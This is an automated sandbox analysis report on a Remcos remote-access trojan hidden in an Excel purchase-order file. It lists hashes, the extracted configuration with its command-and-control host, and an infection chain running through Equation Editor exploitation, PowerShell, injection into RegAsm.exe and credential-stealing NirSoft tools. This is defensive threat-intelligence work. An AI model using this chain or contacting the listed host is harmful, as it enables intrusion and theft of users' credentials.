remcos | 5d09b001c18384a9d5e8b31b9c4ee5ed77082e0a9b8783c34b3916b1534d2c21

Analysis

max time kernel
149s
max time network
158s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-04-2024 15:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

P.O.109961.xls
Size

318KB
MD5

2244bc077c05fd2f5a67fa7ef72559ff
SHA1

a5e42c663a4eaf0468b903ca7aa1f264edba32fc
SHA256

5d09b001c18384a9d5e8b31b9c4ee5ed77082e0a9b8783c34b3916b1534d2c21
SHA512

361d5c5bded8994c672a3a40b0e959cae6c7e9f24a279ba663b968b9f8fc1d0332c2aef3df921d4148c9da0e3101090e012f45b72859f5e609b9efb46c3fbd08
SSDEEP

6144:FuunJRXmY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVM9MI248sD69qlDl5bpI:FvJRX/3bVM9MI5N64lDjihGu

Score

10^/10

remcos remotehost collection rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

nomoreremcos.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-2DQRZG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/2516-309-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2516-320-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 5 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2080-275-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2080-273-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/956-300-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2080-313-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/956-318-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 11 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2080-275-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2080-273-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2856-276-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2856-277-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2856-278-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/956-300-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2516-309-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/916-311-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2080-313-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/956-318-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2516-320-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 6 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

17 336 EQNEDT32.EXE
20 640 WScript.exe
22 1536 powershell.exe
24 1536 powershell.exe
26 1536 powershell.exe
27 1536 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
17	336	EQNEDT32.EXE
20	640	WScript.exe
22	1536	powershell.exe
24	1536	powershell.exe
26	1536	powershell.exe
27	1536	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exeWScript.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\416202433225PM.txt	WScript.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 1536 set thread context of 2456	1536	powershell.exe	RegAsm.exe
PID 2456 set thread context of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 set thread context of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 set thread context of 2856	2456	RegAsm.exe	RegAsm.exe
PID 2456 set thread context of 956	2456	RegAsm.exe	RegAsm.exe
PID 2456 set thread context of 2516	2456	RegAsm.exe	RegAsm.exe
PID 2456 set thread context of 916	2456	RegAsm.exe	RegAsm.exe

Drops file in Windows directory 1 IoCs

Processes:

WScript.exe

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

336 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WScript.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
336	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1096 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exeRegAsm.exe

pid process

2360 powershell.exe
1536 powershell.exe
1536 powershell.exe
1536 powershell.exe
2080 RegAsm.exe
956 RegAsm.exe
2080 RegAsm.exe
956 RegAsm.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

RegAsm.exe

pid process

2456 RegAsm.exe
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

RegAsm.exe

pid process

2456 RegAsm.exe
2456 RegAsm.exe
2456 RegAsm.exe
2456 RegAsm.exe
2456 RegAsm.exe
2456 RegAsm.exe

pid	process
1096	EXCEL.EXE

pid	process
2360	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
2080	RegAsm.exe
956	RegAsm.exe
2080	RegAsm.exe
956	RegAsm.exe

pid	process
2456	RegAsm.exe

pid	process
2456	RegAsm.exe
2456	RegAsm.exe
2456	RegAsm.exe
2456	RegAsm.exe
2456	RegAsm.exe
2456	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2856	RegAsm.exe
Token: SeDebugPrivilege	916	RegAsm.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

1096 EXCEL.EXE
1096 EXCEL.EXE
1096 EXCEL.EXE
2596 WINWORD.EXE
2596 WINWORD.EXE
1096 EXCEL.EXE
1096 EXCEL.EXE

pid	process
1096	EXCEL.EXE
1096	EXCEL.EXE
1096	EXCEL.EXE
2596	WINWORD.EXE
2596	WINWORD.EXE
1096	EXCEL.EXE
1096	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 336 wrote to memory of 640	336	EQNEDT32.EXE	WScript.exe
PID 336 wrote to memory of 640	336	EQNEDT32.EXE	WScript.exe
PID 336 wrote to memory of 640	336	EQNEDT32.EXE	WScript.exe
PID 336 wrote to memory of 640	336	EQNEDT32.EXE	WScript.exe
PID 2596 wrote to memory of 1948	2596	WINWORD.EXE	splwow64.exe
PID 2596 wrote to memory of 1948	2596	WINWORD.EXE	splwow64.exe
PID 2596 wrote to memory of 1948	2596	WINWORD.EXE	splwow64.exe
PID 2596 wrote to memory of 1948	2596	WINWORD.EXE	splwow64.exe
PID 640 wrote to memory of 2360	640	WScript.exe	powershell.exe
PID 640 wrote to memory of 2360	640	WScript.exe	powershell.exe
PID 640 wrote to memory of 2360	640	WScript.exe	powershell.exe
PID 640 wrote to memory of 2360	640	WScript.exe	powershell.exe
PID 640 wrote to memory of 2388	640	WScript.exe	certutil.exe
PID 640 wrote to memory of 2388	640	WScript.exe	certutil.exe
PID 640 wrote to memory of 2388	640	WScript.exe	certutil.exe
PID 640 wrote to memory of 2388	640	WScript.exe	certutil.exe
PID 640 wrote to memory of 452	640	WScript.exe	cmd.exe
PID 640 wrote to memory of 452	640	WScript.exe	cmd.exe
PID 640 wrote to memory of 452	640	WScript.exe	cmd.exe
PID 640 wrote to memory of 452	640	WScript.exe	cmd.exe
PID 2360 wrote to memory of 1536	2360	powershell.exe	powershell.exe
PID 2360 wrote to memory of 1536	2360	powershell.exe	powershell.exe
PID 2360 wrote to memory of 1536	2360	powershell.exe	powershell.exe
PID 2360 wrote to memory of 1536	2360	powershell.exe	powershell.exe
PID 1536 wrote to memory of 2612	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2612	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2612	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2612	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2612	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2612	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2612	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 1536 wrote to memory of 2456	1536	powershell.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2080	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 1156	2456	RegAsm.exe	RegAsm.exe
PID 2456 wrote to memory of 2856	2456	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\P.O.109961.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1096

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
